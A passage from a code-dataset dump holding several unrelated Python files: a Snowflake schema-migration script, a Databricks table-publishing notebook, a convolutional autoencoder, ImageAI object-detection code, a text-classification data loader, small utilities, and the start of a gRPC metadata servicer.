= max_published_version\n if max_published_version_display == '':\n max_published_version_display = 'None'\n print(\"Max applied change script version: %s\" % max_published_version_display)\n if verbose:\n print(\"Change history: %s\" % change_history)\n\n # Find all scripts in the root folder (recursively) and sort them correctly\n all_scripts = get_all_scripts_recursively(root_folder, verbose)\n all_script_names = list(all_scripts.keys())\n all_script_names_sorted = sorted_alphanumeric(all_script_names)\n\n # Loop through each script in order and apply any required changes\n for script_name in all_script_names_sorted:\n script = all_scripts[script_name]\n\n # Only apply a change script if the version is newer than the most recent change in the database\n if get_alphanum_key(script['script_version']) <= get_alphanum_key(max_published_version):\n if verbose:\n print(\"Skipping change script %s because it's older than the most recently applied change (%s)\" % (\n script['script_name'], max_published_version))\n scripts_skipped += 1\n continue\n\n print(\"Applying change script %s\" % script['script_name'])\n apply_change_script(snowfl_acct_type, script, change_history_table, autocommit, verbose)\n scripts_applied += 1\n\n print(\"Successfully applied %d change scripts (skipping %d)\" % (scripts_applied, scripts_skipped))\n print(\"Completed successfully\")\n\n\n# This function will return a list containing the parts of the key (split by number parts)\n# Each number is converted to and integer and string parts are left as strings\n# This will enable correct sorting in python when the lists are compared\n# e.g. get_alphanum_key('1.2.2') results in ['', 1, '.', 2, '.', 2, '']\ndef get_alphanum_key(key):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = [convert(c) for c in re.split('([0-9]+)', key)]\n return alphanum_key\n\n\ndef sorted_alphanumeric(data):\n return sorted(data, key=get_alphanum_key)\n\n\ndef get_all_scripts_recursively(root_directory, verbose):\n all_files = dict()\n all_versions = list()\n # Walk the entire directory structure recursively\n for (directory_path, directory_names, file_names) in os.walk(root_directory):\n for file_name in file_names:\n file_full_path = os.path.join(directory_path, file_name)\n script_name_parts = re.search(r'^([V])(.+)__(.+)\\.sql$', file_name.strip())\n\n # Only process valid change scripts\n if script_name_parts is None:\n if verbose:\n print(\"Ignoring non-change file \" + file_full_path)\n continue\n\n # Add this script to our dictionary (as nested dictionary)\n script = dict()\n script['script_name'] = file_name\n script['script_full_path'] = file_full_path\n script['script_type'] = script_name_parts.group(1)\n script['script_version'] = script_name_parts.group(2)\n script['script_description'] = script_name_parts.group(3).replace('_', ' ').capitalize()\n all_files[file_name] = script\n\n # Throw an error if the same version exists more than once\n if script['script_version'] in all_versions:\n raise ValueError(\"The script version %s exists more than once (second instance %s)\" % (\n script['script_version'], script['script_full_path']))\n all_versions.append(script['script_version'])\n\n return all_files\n\n\ndef execute_snowflake_query(snowfl_acct_type, snowflake_database, query, autocommit, verbose):\n if snowfl_acct_type == 'TEST':\n con = snowflake.connector.connect(\n user='MATILLION',\n password=os.environ['SNOWFL_MTL_PW'],\n account=os.environ['SNOWFL_TST_ACCT'],\n port=os.environ['SNOWFL_TST_PORT'], # use port forwarding from local machine\n insecure_mode=True, # disable oscp checking from local machine\n warehouse=\"COMPUTE\",\n database=snowflake_database,\n )\n else:\n print('Only use Snowflake test instance for POC, exiting program...')\n sys.exit(1)\n\n if not autocommit:\n con.autocommit(False)\n\n if verbose:\n print(\"SQL query: %s\" % query)\n\n try:\n res = con.execute_string(query)\n if not autocommit:\n con.commit()\n return res\n except Exception as e:\n if not autocommit:\n con.rollback()\n raise e\n finally:\n con.close()\n\n\ndef get_change_history_table_details(change_history_table_override):\n # Start with the global defaults\n details = dict()\n details['database_name'] = _metadata_database_name.upper()\n details['schema_name'] = _metadata_schema_name.upper()\n details['table_name'] = _metadata_table_name.upper()\n\n # Then override the defaults if requested. The name could be in one, two or three part notation.\n if change_history_table_override is not None:\n table_name_parts = change_history_table_override.strip().split('.')\n\n if len(table_name_parts) == 1:\n details['table_name'] = table_name_parts[0].upper()\n elif len(table_name_parts) == 2:\n details['table_name'] = table_name_parts[1].upper()\n details['schema_name'] = table_name_parts[0].upper()\n elif len(table_name_parts) == 3:\n details['table_name'] = table_name_parts[2].upper()\n details['schema_name'] = table_name_parts[1].upper()\n details['database_name'] = table_name_parts[0].upper()\n else:\n raise ValueError(\"Invalid change history table name: %s\" % change_history_table_override)\n\n return details\n\n\ndef create_change_history_table_if_missing(snowfl_acct_type, change_history_table, autocommit, verbose):\n # Create the database if it doesn't exist\n query = \"CREATE DATABASE IF NOT EXISTS {0}\".format(change_history_table['database_name'])\n execute_snowflake_query(snowfl_acct_type, '', query, autocommit, verbose)\n\n # Create the schema if it doesn't exist\n query = \"CREATE SCHEMA IF NOT EXISTS {0}\".format(change_history_table['schema_name'])\n execute_snowflake_query(snowfl_acct_type, change_history_table['database_name'], query, autocommit, verbose)\n\n # Finally, create the change history table if it doesn't exist\n query = \"CREATE TABLE IF NOT EXISTS {0}.{1} (VERSION VARCHAR, DESCRIPTION VARCHAR, SCRIPT VARCHAR, SCRIPT_TYPE VARCHAR, CHECKSUM VARCHAR, EXECUTION_TIME NUMBER, STATUS VARCHAR, INSTALLED_BY VARCHAR, INSTALLED_ON TIMESTAMP_LTZ)\".format(\n change_history_table['schema_name'], change_history_table['table_name'])\n execute_snowflake_query(snowfl_acct_type, change_history_table['database_name'], query, autocommit, verbose)\n\n\ndef fetch_change_history(snowflake_acct_type, change_history_table, autocommit, verbose):\n query = 'SELECT VERSION FROM {0}.{1}'.format(change_history_table['schema_name'],\n change_history_table['table_name'])\n results = execute_snowflake_query(snowflake_acct_type, change_history_table['database_name'], query, autocommit, verbose)\n\n # Collect all the results into a list\n change_history = list()\n for cursor in results:\n for row in cursor:\n change_history.append(row[0])\n\n return change_history\n\n\ndef apply_change_script(snowfl_acct_type, script, change_history_table, autocommit, verbose):\n # First read the contents of the script\n with open(script['script_full_path'], 'r') as content_file:\n content = content_file.read().strip()\n content = content[:-1] if content.endswith(';') else content\n\n # Define a few other change related variables\n checksum = hashlib.sha224(content.encode('utf-8')).hexdigest()\n execution_time = 0\n status = 'Success'\n\n # Execute the contents of the script\n if len(content) > 0:\n start = time.time()\n execute_snowflake_query(snowfl_acct_type, '', content, autocommit, verbose)\n end = time.time()\n execution_time = round(end - start)\n\n # Finally record this change in the change history table\n query = \"INSERT INTO {0}.{1} (VERSION, DESCRIPTION, SCRIPT, SCRIPT_TYPE, CHECKSUM, EXECUTION_TIME, STATUS, INSTALLED_BY, INSTALLED_ON) values ('{2}','{3}','{4}','{5}','{6}',{7},'{8}','{9}',CURRENT_TIMESTAMP);\".format(\n change_history_table['schema_name'], change_history_table['table_name'], script['script_version'],\n script['script_description'], script['script_name'], script['script_type'], checksum, execution_time, status,\n os.environ[\"SNOWFLAKE_USER\"])\n execute_snowflake_query(snowfl_acct_type, change_history_table['database_name'], query, autocommit, verbose)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Parses command line arguments')\n parser.add_argument('-f', '--root-folder', type=str, default=\".\",\n help='The root folder for the database change scripts')\n parser.add_argument('-t', '--snowflake_acct_type', type=str, choices=['PROD', 'TEST'],\n help='Snowflake connection account type')\n parser.add_argument('-d', '--database', type=str, default='ENTERPRISE', help='Database to traverse')\n parser.add_argument('-s', '--schema', type=str, default='DATA_LAKE', help='Schema to traverse')\n parser.add_argument('-c', '--change-history-table', type=str,\n help='Used to override the default name of the change history table '\n '(e.g. METADATA.SNOWCHANGE.CHANGE_HISTORY)',\n required=False)\n parser.add_argument('-ac', '--autocommit', action='store_true')\n parser.add_argument('-v', '--verbose', action='store_true')\n args = parser.parse_args()\n\n snowchange(args.root_folder, args.snowflake_acct_type, args.change_history_table, args.autocommit, args.verbose)\n\n # cur.close()\n # con.close()\n\n\ntry:\n main()\nexcept Exception as err:\n print(err)\n sys.exit(1)\n","sub_path":"snowchange.py","file_name":"snowchange.py","file_ext":"py","file_size_in_byte":11869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"329778315","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC COPYRIGHT: Columbia Sportswear 2019
\n# MAGIC DESCRIPTION: Publishes OMNI Planning Location table imported from Excel UMT\n# MAGIC \n# MAGIC -----------------------------------------------------------------\n# MAGIC ###### MODIFICATION LOG\n# MAGIC | Programmmer| Change Request| Date| Change Description|\n# MAGIC |----------------------|-----------------|------------|--------------------------------------------------------------------|\n# MAGIC | Kelly Jain| Created| 11/06/2019| Omni Planning SIT2 release 20200422|\n\n# COMMAND ----------\n\n#edw_lnd_umt.umt_planning_location\n\n# COMMAND ----------\n\nfrom functools import reduce\nfrom datetime import datetime, timedelta\nfrom pyspark.sql import Row\nfrom pyspark.sql.types import IntegerType,DateType,StringType,LongType,DoubleType\nfrom pyspark.sql.functions import (col,when,current_timestamp,current_date,date_format,split,coalesce,lit,DataFrame,row_number,date_sub,next_day,substring,trunc,rtrim,concat,min,max,sum,asc,desc,trim,month,year,monotonically_increasing_id)\nfrom pyspark.sql.window import Window\nfrom delta.tables import *\n\n# COMMAND ----------\n\n#Check for existence of Destination then pick appropriate data from Source\ntblList = sqlContext.tableNames('entpr_plng_app')\nif 'planning_location' not in tblList:\n a = spark.table('edw_lnd_umt.umt_planning_location').agg({'EDW_UPDT_TS':'max'})\n va = a.distinct().collect()[0][0]\n location_df1 = spark.table('edw_lnd_umt.umt_planning_location').where(col('EDW_UPDT_TS') == va)\nelse:\n a = spark.table('edw_lnd_umt.umt_planning_location').agg({'EDW_UPDT_TS':'max'})\n b = spark.table('entpr_plng_app.planning_location').agg({'EDW_UPDT_TS':'max'})\n va = a.distinct().collect()[0][0]\n vb = b.distinct().collect()[0][0]\n if va > vb:\n location_df1 = spark.table('edw_lnd_umt.umt_planning_location').where(col('EDW_UPDT_TS') == va)\n else:\n dbutils.notebook.exit(\"No new Location data\")\n \n\n# COMMAND ----------\n\nlocation_df11 = location_df1.filter((col('SubRegion') == 'EUR') & (col('StoreType').isNull())).withColumn('InventorySource',lit('SAP'))\nlocation_df12 = location_df1.filter((col('Region') == 'NA') & (col('StoreType').isNull())).withColumn('InventorySource',lit('SAP'))\nlocation_df13 = location_df1.filter((col('SubRegion') == 'EUR') & (col('StoreType').isNotNull())).withColumn('InventorySource',lit('JDA'))\nlocation_df14 = location_df1.filter((col('Region') == 'NA') & (col('StoreType').isNotNull())).withColumn('InventorySource',lit('D365'))\nlocation_df15 = location_df1.filter((col('SubRegion') == 'CHN')).withColumn('InventorySource',lit('SAP'))\nlocation_df16 = location_df1.filter((col('SubRegion') == 'JPN')).withColumn('InventorySource',lit('JDE'))\nlocation_df17 = location_df1.filter((col('Region') == 'IDR')).withColumn('InventorySource',lit(None))\nlocation_df18 = location_df1.filter((col('SubRegion') == 'KOR')).withColumn('InventorySource',lit(None))\nlocation_df19 = location_df1.filter((col('Region').isNull())).withColumn('InventorySource',lit(None))\nlocation_df20 =(location_df11.union(location_df12).union(location_df13).union(location_df14).union(location_df15).union(location_df16).union(location_df17).union(location_df18).union(location_df19))\n\n# COMMAND ----------\n\nlocation_df = location_df20.withColumn('OpenDate', coalesce(col('OpenDate'),lit('2000-01-01')).cast(DateType())).withColumn('CloseDate', coalesce(col('CloseDate'),lit('2099-12-31')).cast(DateType()))\n\n# COMMAND ----------\n\n#Publish to DBFS/ADLS\nspark.sql(\"CREATE DATABASE IF NOT EXISTS entpr_plng_app LOCATION '/mnt/entadls/published/eim/managed/'\")\nlocation_df.write.saveAsTable('entpr_plng_app.planning_location', format='delta', mode='overwrite')\n","sub_path":"C1-SIT3/entpr_plng_app/planning_location.py","file_name":"planning_location.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"26681805","text":"import math\n\nimport numpy as np\nfrom keras import Input, Model, losses\nfrom keras.layers import Reshape, Convolution2D, Dense, \\\n UpSampling2D, Deconvolution2D, ZeroPadding2D, GaussianNoise, MaxPooling2D\n\nfrom latale.model.Autoencoder import Autoencoder\nfrom latale.model.Network import sequential, flatten\n\n\nclass ConvolutionalAutoencoder(Autoencoder):\n def __init__(self, path, net_name, optimizer=None):\n super().__init__(path, net_name, optimizer)\n self._loss = None\n self.features = None\n\n def build(self, input_shape):\n if self._built:\n return\n self._built = True\n\n _encoder = self.build_encoder(input_shape)\n _decoder = self.build_decoder(input_shape)\n\n x = Input(shape=input_shape)\n z = sequential([flatten, *_encoder])(x)\n y = sequential(_decoder)(flatten(z))\n\n z2 = Input(shape=(self._parameters['N'] * self._parameters['M'],))\n y2 = sequential(_decoder)(flatten(z2))\n w2 = sequential([*_encoder])(flatten(y2))\n\n self._loss = losses.mean_squared_error\n\n self.encoder = Model(x, z)\n self.decoder = Model(z2, y2)\n self.autoencoder = Model(x, y)\n self.autodecoder = Model(z2, w2)\n self.network = self.autoencoder\n\n def build_encoder(self, input_shape):\n # noinspection PyUnusedLocal\n return [Reshape((*input_shape, 1)),\n GaussianNoise(self._parameters['noise']),\n *[sequential([Convolution2D(self._parameters['clayer'], self._parameters['kernel'],\n kernel_initializer=self._parameters['kernel_initializer'],\n activation=self._parameters['activation'], padding='same',\n use_bias=False, ),\n MaxPooling2D(pool_size=(2, 2)), ])\n for i in range(self._parameters['num_clayers'])],\n flatten,\n Dense(self._parameters['N'] * self._parameters['M'],\n activation=self._parameters['bottleneck_activation']), ]\n\n def build_decoder(self, input_shape):\n # Compute dimensionality for outer layer\n dim_reduction = int(math.pow(2, self._parameters['num_clayers']))\n last_convolution = np.array(input_shape) // dim_reduction\n reconstruction = last_convolution * dim_reduction\n zero_pad = input_shape - reconstruction\n zero_pad = (int(zero_pad[0] / 2), int(zero_pad[0] - int(zero_pad[0] / 2))), (int(zero_pad[1] / 2), int(\n zero_pad[1] - int(zero_pad[1] / 2)))\n\n # noinspection PyUnusedLocal\n return [*[Dense(np.prod(last_convolution) * self._parameters['clayer'],\n activation=self._parameters['activation'], use_bias=False), ],\n Reshape((*last_convolution, self._parameters['clayer'])),\n *[sequential([UpSampling2D((2, 2)),\n Deconvolution2D(self._parameters['clayer'], self._parameters['kernel'],\n kernel_initializer=self._parameters['kernel_initializer'],\n activation=self._parameters['activation'], padding='same',\n use_bias=False), ])\n for i in range(self._parameters['num_clayers'] - 1)],\n # Last deconvolution must consider a single filter.\n *[UpSampling2D((2, 2)),\n Deconvolution2D(1, self._parameters['kernel'], activation=self._parameters['activation'],\n padding='same'), ],\n ZeroPadding2D(zero_pad),\n Reshape(input_shape), ]\n","sub_path":"latale/latale/model/ConvolutionalAutoencoder.py","file_name":"ConvolutionalAutoencoder.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"326215049","text":"\n\n#Dette ser ut som fin kode, men jeg er litt usikker på hvordan printen takler int + string\n#Plusse forskjellige typer mot hverandre kan ofte skape litt problemer, og naa har vi castet inputet\n#over til et int. \n\na = input(\"Tast inn et heltall! \")\nb = int(a)\nif b <10:\n print (b + \"Hei!\")\n","sub_path":"oblig2/kodeforstaaelse.py","file_name":"kodeforstaaelse.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"60599922","text":"import sys\n\n\ndef count_net_params(net, show_details=False):\n params = list(net.parameters())\n k = 0\n for i in params:\n l = 1\n for j in i.size():\n l *= j\n if show_details: print (\"Struct:\", list(i.size()), \" -- %d params\" % l)\n k += l\n if show_details: print (\"%d params in total\" % k)\n return k\n\n\ndef test_network(net, show_count=True):\n print (net)\n if show_count: print (count_net_params(net, True))\n sys.exit()\n","sub_path":"test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"267020948","text":"import pandas as pd\nimport numpy as np\nimport torch\n\nfrom pathlib import Path\nfrom preprocess import Tokenizer, Vocab\nfrom utils import check_labels, load_w2v_embedding, load_fasttext_embedding, pad_collate\nfrom torch.utils.data import Dataset, DataLoader\nfrom functools import partial\nfrom exp_config import TEXT_COL, LABEL_COLS, PAD_TOKEN\n\n\nclass TextLMData(): \n def __init__(self, \n path,\n csv,\n test_csv,\n text_col, \n label_cols, \n max_vocab,\n min_freq,\n valid_pct=0.2):\n \n self.path = path\n self.csv = csv\n self.test_csv = test_csv\n self.text_cols = text_col\n self.label_cols = label_cols\n self.valid_pct = valid_pct\n self.max_vocab = max_vocab\n self.min_freq = min_freq\n \n self.df = pd.read_csv(Path(self.path)/self.csv)\n if self.test_csv is not None: self.test_df = pd.read_csv(Path(self.path)/self.test_csv) \n self.cut = int(valid_pct * len(self.df)) + 1\n \n def process(self):\n tok = Tokenizer()\n \n # consider entire corpus as text ( train + test text columns )\n if self.test_csv:\n text = list(self.df.loc[:, self.text_cols].values) + list(self.test_df.loc[:, self.text_cols])\n else:\n text = list(self.df.loc[:, self.text_cols].values)\n \n self.tokens = [tok.tokenizer(x) for x in text]\n self.vocab = Vocab.create(self.tokens, self.max_vocab, self.min_freq)\n \n self.ntokens = [self.vocab.numericalize(t) for t in self.tokens]\n \n # only full training\n if self.valid_pct == 0 and self.test_csv is None:\n self.trn_ds = (self.ntokens, self.df.loc[:, self.label_cols].values)\n self.vld_ds = ([], [])\n self.test_ds = ([], [])\n \n # holdout\n elif self.valid_pct > 0 and self.test_csv is None:\n self.trn_ds = (self.ntokens[self.cut:], self.df.loc[:, self.label_cols].values[self.cut:])\n self.vld_ds = (self.ntokens[:self.cut], self.df.loc[:, self.label_cols].values[:self.cut])\n self.tst_ds = ([], [])\n \n # holdout and test prediction\n elif self.valid_pct > 0 and self.test_csv is not None:\n self.trn_tokens = self.ntokens[:len(self.df)]\n self.tst_ds = (self.ntokens[len(self.df):], [])\n \n trn_tokens = self.trn_tokens[self.cut:]\n vld_tokens = self.trn_tokens[:self.cut]\n \n self.trn_ds = (trn_tokens, self.df.loc[:, self.label_cols].values[self.cut:])\n self.vld_ds = (vld_tokens, self.df.loc[:, self.label_cols].values[:self.cut])\n \n # full training and test prediction\n else:\n self.trn_ds = (self.ntokens[:len(self.df)], self.df.loc[:, self.label_cols].values)\n self.vld_ds = ([], [])\n self.tst_ds = (self.ntokens[len(self.df):], [])\n \n return self.vocab, self.trn_ds, self.vld_ds, self.tst_ds\n \n def fill_emb_matrix(self, emb_type, embed_size):\n emb_matrix = np.random.random(size=(len(self.vocab.itos), embed_size))\n \n if emb_type == 'w2v':\n emb_matrix = load_w2v_embedding(emb_matrix, self.vocab, embed_size)\n elif emb_type == 'fasttext':\n emb_matrix = load_fasttext_embedding(emb_matrix, self.vocab, embed_size)\n \n return emb_matrix\n\n\nclass TextClassData(Dataset):\n def __init__(self, vocab, ds):\n self.vocab = vocab\n self.ds, self.y = ds\n \n def __len__(self):\n return len(self.ds)\n \n def __getitem__(self, index):\n x = torch.LongTensor(self.ds[index])\n y = None\n if len(self.y) > 0: y = torch.FloatTensor(self.y[index])\n \n return x, y\n\n\ndef make_dataset(config):\n\n path = Path(config['path'])\n csv = config['csv']\n text_col = TEXT_COL \n label_cols = LABEL_COLS\n test_csv = config['test_csv']\n max_vocab = config['max_vocab']\n min_freq = config['min_freq']\n embed_size = config['embed_size']\n emb_type = config['emb_type']\n valid_pct = config['valid_pct']\n\n lm = TextLMData(path,\n csv,\n test_csv,\n text_col,\n label_cols,\n max_vocab,\n min_freq,\n valid_pct=valid_pct)\n\n vocab, trn_ds, vld_ds, tst_ds = lm.process()\n emb_matrix = lm.fill_emb_matrix(emb_type, embed_size)\n \n return vocab, trn_ds, vld_ds, tst_ds, emb_matrix\n\n\ndef make_iterator(config, vocab, trn_ds, vld_ds, tst_ds):\n sent_len = config['sent_len']\n collate_fn = partial(pad_collate, pad_idx=vocab.stoi[PAD_TOKEN], sent_len=sent_len)\n \n trn_ds = TextClassData(vocab, trn_ds)\n if len(vld_ds) > 0: vld_ds = TextClassData(vocab, vld_ds)\n if len(tst_ds) > 0: tst_ds = TextClassData(vocab, tst_ds)\n\n trn_dl = DataLoader(trn_ds, batch_size=config['batch_size'], shuffle=True, collate_fn=collate_fn, num_workers=config['ncpus'])\n vld_dl, tst_dl = None, None\n\n if len(vld_ds) > 0: vld_dl = DataLoader(vld_ds, batch_size=config['batch_size'], shuffle=False, collate_fn=collate_fn, num_workers=config['ncpus'])\n if len(tst_ds) > 0: tst_dl = DataLoader(tst_ds, batch_size=config['batch_size'], shuffle=False, collate_fn=collate_fn, num_workers=config['ncpus'])\n \n return trn_dl, vld_dl, tst_dl\n","sub_path":"src/cnn_sent_classification/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"372816419","text":"from itertools import count\r\n\r\nimport cv2\r\n\r\nfrom imageai.Detection.keras_retinanet.models.resnet import resnet50_retinanet\r\nfrom imageai.Detection.keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image\r\nfrom imageai.Detection.keras_retinanet.utils.visualization import draw_box, draw_caption\r\nfrom imageai.Detection.keras_retinanet.utils.colors import label_color\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as pltimage\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport os\r\n\r\n\r\ndef get_session():\r\n config = tf.ConfigProto()\r\n config.gpu_options.allow_growth = True\r\n return tf.Session(config=config)\r\n\r\n\r\nclass ObjectDetection:\r\n \"\"\"\r\n This is the object detection class for images in the ImageAI library. It provides support for RetinaNet\r\n object detection network . After instantiating this class, you can set it's properties and\r\n make object detections using it's pre-defined functions.\r\n\r\n The following functions are required to be called before object detection can be made\r\n * setModelPath()\r\n * At least of of the following and it must correspond to the model set in the setModelPath()\r\n [setModelTypeAsRetinaNet(), setModelTypeAsYOLO()]\r\n * loadModel() [This must be called once only before performing object detection]\r\n\r\n Once the above functions have been called, you can call the detectObjectsFromImage() function of the object detection instance\r\n object at anytime to obtain observable objects in any image.\r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.__modelType = \"\"\r\n self.modelPath = \"\"\r\n self.__modelPathAdded = False\r\n self.__modelLoaded = False\r\n self.__model_collection = []\r\n\r\n self.numbers_to_names = {0: 'person', 1: 'bicycle', 2: 'car', 3: 'motorcycle', 4: 'airplane', 5: 'bus', 6: 'train',\r\n 7: 'truck', 8: 'boat', 9: 'traffic light', 10: 'fire hydrant', 11: 'stop sign', 12: 'parking meter',\r\n 13: 'bench', 14: 'bird', 15: 'cat', 16: 'dog', 17: 'horse', 18: 'sheep', 19: 'cow', 20: 'elephant',\r\n 21: 'bear', 22: 'zebra', 23: 'giraffe', 24: 'backpack', 25: 'umbrella', 26: 'handbag', 27: 'tie',\r\n 28: 'suitcase', 29: 'frisbee', 30: 'skis', 31: 'snowboard', 32: 'sports ball', 33: 'kite',\r\n 34: 'baseball bat', 35: 'baseball glove', 36: 'skateboard', 37: 'surfboard', 38: 'tennis racket',\r\n 39: 'bottle', 40: 'wine glass', 41: 'cup', 42: 'fork', 43: 'knife', 44: 'spoon', 45: 'bowl',\r\n 46: 'banana', 47: 'apple', 48: 'sandwich', 49: 'orange', 50: 'broccoli', 51: 'carrot', 52: 'hot dog',\r\n 53: 'pizza', 54: 'donut', 55: 'cake', 56: 'chair', 57: 'couch', 58: 'potted plant', 59: 'bed',\r\n 60: 'dining table', 61: 'toilet', 62: 'tv', 63: 'laptop', 64: 'mouse', 65: 'remote', 66: 'keyboard',\r\n 67: 'cell phone', 68: 'microwave', 69: 'oven', 70: 'toaster', 71: 'sink', 72: 'refrigerator',\r\n 73: 'book', 74: 'clock', 75: 'vase', 76: 'scissors', 77: 'teddy bear', 78: 'hair drier',\r\n 79: 'toothbrush'}\r\n\r\n\r\n\r\n\r\n def setModelTypeAsRetinaNet(self):\r\n \"\"\"\r\n 'setModelTypeAsRetinaNet()' is used to set the model type to the RetinaNet model\r\n for the object detection instance instance object .\r\n :return:\r\n \"\"\"\r\n self.__modelType = \"retinanet\"\r\n\r\n\r\n def setModelPath(self, model_path):\r\n \"\"\"\r\n 'setModelPath()' function is required and is used to set the file path to a the RetinaNet\r\n object detectio model trained on the COCO dataset.\r\n :param model_path:\r\n :return:\r\n \"\"\"\r\n\r\n if(self.__modelPathAdded == False):\r\n self.modelPath = model_path\r\n self.__modelPathAdded = True\r\n\r\n\r\n\r\n def loadModel(self):\r\n \"\"\"\r\n 'loadModel()' function is required and is used to load the model structure into the program from the file path defined\r\n in the setModelPath() function\r\n\r\n :param:\r\n :return:\r\n \"\"\"\r\n\r\n if (self.__modelLoaded == False):\r\n if(self.__modelType == \"\"):\r\n raise ValueError(\"You must set a valid model type before loading the model.\")\r\n elif(self.__modelType == \"retinanet\"):\r\n model = resnet50_retinanet(num_classes=80)\r\n model.load_weights(self.modelPath)\r\n self.__model_collection.append(model)\r\n self.__modelLoaded = True\r\n\r\n\r\n def detectObjectsFromImage(self, image_path, output_image_path, save_detected_objects = False, minimum_percentage_probability = 50):\r\n \"\"\"\r\n 'detectObjectsFromImage()' function is used to detect objects observable in the given image path:\r\n * image_path , file path to the image\r\n * output_image_path , file path to the output image that will contain the detection boxes and label\r\n * save_detected_objects (optional, False by default) , option to save each object detected individually as an image and return an array of the objects' image path.\r\n * minimum_percentage_probability (optional, 50 by default) , option to set the minimum percentage probability for nominating a detected object for output.\r\n\r\n This function returns an array of dictionaries, with each dictionary corresponding to the objects\r\n detected in the image. Each dictionary contains the following property:\r\n - name\r\n - percentage_probability\r\n\r\n If 'save_detected_objects' is set to 'True', this function will return another array (making 2 arrays\r\n that will be returned) that contains list of all the paths to the saved image of each object detected\r\n\r\n :param image_path:\r\n :param output_image_path:\r\n :param save_detected_objects:\r\n :param minimum_percentage_probability:\r\n :return output_objects_array:\r\n \"\"\"\r\n\r\n if(self.__modelLoaded == False):\r\n raise ValueError(\"You must call the loadModel() function before making object detection.\")\r\n elif(self.__modelLoaded == True):\r\n try:\r\n output_objects_array = []\r\n detected_objects_image_array = []\r\n\r\n image = read_image_bgr(image_path)\r\n detected_copy = image.copy()\r\n detected_copy = cv2.cvtColor(detected_copy, cv2.COLOR_BGR2RGB)\r\n\r\n detected_copy2 = image.copy()\r\n detected_copy2 = cv2.cvtColor(detected_copy2, cv2.COLOR_BGR2RGB)\r\n\r\n image = preprocess_image(image)\r\n image, scale = resize_image(image)\r\n\r\n model = self.__model_collection[0]\r\n _, _, detections = model.predict_on_batch(np.expand_dims(image, axis=0))\r\n predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)\r\n scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]\r\n\r\n detections[0, :, :4] /= scale\r\n\r\n min_probability = minimum_percentage_probability / 100\r\n counting = 0\r\n\r\n for index, (label, score), in enumerate(zip(predicted_numbers, scores)):\r\n if score < min_probability:\r\n continue\r\n\r\n counting += 1\r\n\r\n objects_dir = output_image_path + \"-objects\"\r\n if(save_detected_objects == True):\r\n if (os.path.exists(objects_dir) == False):\r\n os.mkdir(objects_dir)\r\n\r\n color = label_color(label)\r\n\r\n detection_details = detections[0, index, :4].astype(int)\r\n draw_box(detected_copy, detection_details, color=color)\r\n\r\n caption = \"{} {:.3f}\".format(self.numbers_to_names[label], (score * 100))\r\n draw_caption(detected_copy, detection_details, caption)\r\n\r\n each_object_details = {}\r\n each_object_details[\"name\"] = self.numbers_to_names[label]\r\n each_object_details[\"percentage_probability\"] = str(score * 100)\r\n output_objects_array.append(each_object_details)\r\n\r\n if(save_detected_objects == True):\r\n splitted_copy = detected_copy2.copy()[detection_details[1]:detection_details[3],\r\n detection_details[0]:detection_details[2]]\r\n splitted_image_path = objects_dir + \"\\\\\" + self.numbers_to_names[label] + \"-\" + str(counting) + \".jpg\"\r\n pltimage.imsave(splitted_image_path, splitted_copy)\r\n detected_objects_image_array.append(splitted_image_path)\r\n\r\n pltimage.imsave(output_image_path, detected_copy)\r\n\r\n if(save_detected_objects == True):\r\n return output_objects_array, detected_objects_image_array\r\n else:\r\n return output_objects_array\r\n except:\r\n raise ValueError(\"Ensure you specified correct paths for the input and output image \")\r\n\r\n\r\n","sub_path":"imageai/Detection/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"612845076","text":"from __future__ import annotations\n\nimport logging\nimport traceback\nfrom typing import TYPE_CHECKING\nfrom uuid import UUID\n\nimport grpc\nfrom google.protobuf.empty_pb2 import Empty\n\nfrom dataclay.metadata.kvdata import ObjectMetadata\nfrom dataclay.protos import (\n common_messages_pb2,\n metadata_service_pb2,\n metadata_service_pb2_grpc,\n)\n\nif TYPE_CHECKING:\n from dataclay.metadata.api import MetadataAPI\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass MetadataServicer(metadata_service_pb2_grpc.MetadataServiceServicer):\n \"\"\"Provides methods that implement functionality of metadata server\"\"\"\n\n def __init__(self, metadata_service: MetadataAPI):\n self.metadata_service = metadata_service\n logger.debug(\"Initialized MetadataServiceServicer\")\n\n # TODO: define get_exception_info(..) to serialize excpetions\n\n def NewAccount(self, request, context):\n try:\n self.metadata_service.new_account(request.username, request.password)\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n\n def NewSession(self, request, context):\n try:\n session = self.metadata_service.new_session(\n request.username, request.password, request.dataset_name\n )\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return common_messages_pb2.Session()\n return session.get_proto()\n\n def NewDataset(self, request, context):\n try:\n self.metadata_service.new_dataset(request.username, request.password, request.dataset)\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n\n def 